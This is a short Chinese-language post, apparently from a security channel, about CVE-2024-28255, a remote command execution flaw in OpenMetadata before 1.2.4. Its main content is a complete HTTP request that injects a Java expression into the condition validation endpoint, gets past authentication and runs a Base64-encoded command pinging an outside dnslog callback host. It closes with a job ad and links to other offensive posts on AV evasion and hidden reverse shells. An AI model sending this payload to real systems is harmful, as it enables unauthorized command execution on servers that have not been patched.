CVE-2024-28255 RCE漏洞（附EXP）

灰帽安全 2024-04-11 18:23

0x01  前言

OpenMetadata是一个用于数据治理的一体化平台。

condition接口存在远程命令执行漏洞。

0x02  影响版本

OpenMetadata  < 1.2.4

0x03  漏洞复现

EXP如下：（
执行的命令需要Base64编码
）

GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22cGluZyAtYyA2IDcxNjd0OC5kbnNsb2cuY24=%22))) HTTP/1.1
Host: ip
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

发送该请求，如下利用成功！

0x04  修复方案

建议及时更新

HVV内推通道↓↓↓
1.
1. 高薪招聘 | 诚招Hvv“攻防演练”工程师！

2. 扫码或者点击下方链接报名投递简历即可

4. 记得备注【EchoSec】优先直推面试哦~

5. http://gywa.com.cn/cTiWka

6. 后台回复关键字【
   内推面试
   】也可投递~

8. 祝师傅们面试顺利！！GoodLucky！！

9. 

10. 

往期回顾

1111
1. ☆
☆
☆
☆
☆

| CVE-2023-33246 RCE漏洞（附EXP）

1. 
   ☆
   ☆
   ☆
   ☆
   ☆

| 横向移动与域控权限维持方法总汇

1. 
   ☆
   ☆
   ☆
   ☆
   ☆

| Apache HTTPd最新RCE漏洞复现

1. 
   ☆
   ☆
   ☆
   ☆
   ☆

| CNVD-2023-34111 RCE漏洞（附EXP）

1. 
   ☆
   ☆
   ☆
   ☆
   ☆

| Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

1. 
   ☆
   ☆
   ☆
   ☆
   ☆

| MySQL数据库利用姿势

1. 
   ☆
   ☆
   ☆
   ☆
   ☆

| phpMyAdmin漏洞利用汇总

1. 
   ☆
   ☆
   ☆
   ☆
   ☆
    | 泛微E-Mobile任意文件上传漏洞（附EXP）

2. 
   ☆
   ☆
   ☆
   ☆
   ☆

| 小技巧~用一条命令来隐藏反向Shell

1. 
   ☆
   ☆
   ☆
   ☆
   ☆

| New免杀ShellCode加载器（附下载）

1. ☆
   ☆
   ☆
   ☆
   ☆

| 红队攻防 | 解决HW被疯狂封IP姿势～（附下载）

2. 

关注我

获得更多精彩

2. 觉得内容不错，就点下“赞”和“在看”如侵权请私聊公众号删文

3.